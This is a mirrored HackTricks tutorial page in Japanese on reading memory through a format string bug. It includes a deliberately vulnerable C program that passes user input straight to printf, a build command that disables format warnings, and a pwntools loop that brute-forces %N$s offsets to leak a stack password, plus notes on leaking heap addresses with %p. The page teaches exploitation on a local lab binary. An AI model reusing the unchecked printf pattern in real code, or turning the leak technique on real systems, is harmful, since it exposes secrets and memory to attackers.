Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-11-26 06:30:37 +00:00
Code Issues Projects Releases Packages Wiki Activity
hacktricks/binary-exploitation/format-strings/format-strings-arbitrary-read-example.md

4.8 KiB
Raw Blame History

フォーマット文字列 - 任意の読み取り例

ゼロからヒーローまでAWSハッキングを学ぶ htARTEHackTricks AWS Red Team Expert

HackTricksをサポートする他の方法

コード

#include <stdio.h>
#include <string.h>

char bss_password[20] = "hardcodedPassBSS"; // Password in BSS

int main() {
char stack_password[20] = "secretStackPass"; // Password in stack
char input1[20], input2[20];

printf("Enter first password: ");
scanf("%19s", input1);

printf("Enter second password: ");
scanf("%19s", input2);

// Vulnerable printf
printf(input1);
printf("\n");

// Check both passwords
if (strcmp(input1, stack_password) == 0 && strcmp(input2, bss_password) == 0) {
printf("Access Granted.\n");
} else {
printf("Access Denied.\n");
}

return 0;
}

コンパイル方法:

clang -o fs-read fs-read.c -Wno-format-security

スタックから読み取る

stack_password はローカル変数なので、スタックに保存されます。そのため、printfを悪用してスタックの内容を表示するだけで十分です。これは、スタックからパスワードを漏洩させるために最初の100個の位置をBFするエクスプロイトです。

from pwn import *

for i in range(100):
print(f"Try: {i}")
payload = f"%{i}$s\na".encode()
p = process("./fs-read")
p.sendline(payload)
output = p.clean()
print(output)
p.close()

画像では、スタックから10番目の位置にあるパスワードを漏洩させることが可能であることがわかります。

同じエクスプロイトを実行するが、%sの代わりに%pを使用すると、スタックからヒープアドレスを漏洩させることが可能であり、そのアドレスは%5$pにあります。

漏洩したアドレスとパスワードのアドレスとの違いは次の通りです:

> print 0xaaaaaaac12b2 - 0xaaaaaaac0048
$1 = 0x126a
AWSハッキングをゼロからヒーローまで学ぶ htARTEHackTricks AWS Red Team Expert

HackTricksをサポートする他の方法: